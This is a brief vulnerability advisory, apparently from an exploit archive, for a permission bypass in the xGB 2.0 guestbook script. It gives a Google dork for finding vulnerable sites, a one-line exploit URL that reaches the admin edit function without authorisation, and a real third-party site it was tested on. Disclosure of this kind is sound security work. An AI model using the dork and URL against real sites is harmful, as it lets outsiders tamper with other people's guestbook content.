/* * * xGB 2.0 (xGB.php) Remote Permission Bypass Vulnerability * Bug discovered by DarkFuneral * http://www.darkfuneral89.altervista.org/ * * Affected Software: xGB * CMS Site: "i don't know! :P" * Severity: Critical * Description: An attacker can edit all message in xGB * Google Dork: allinurl:"xGb.php" * * E-Mail: darkfuneral89@gmail.com * * * * * Exploit Code: http://www.site.com/path/xGB.php?act=admin&do=edit * * * * Tested on www.culturebeach.de/guestbook.php * * Special Greetz to SystemFAILURE because I Love Him... * */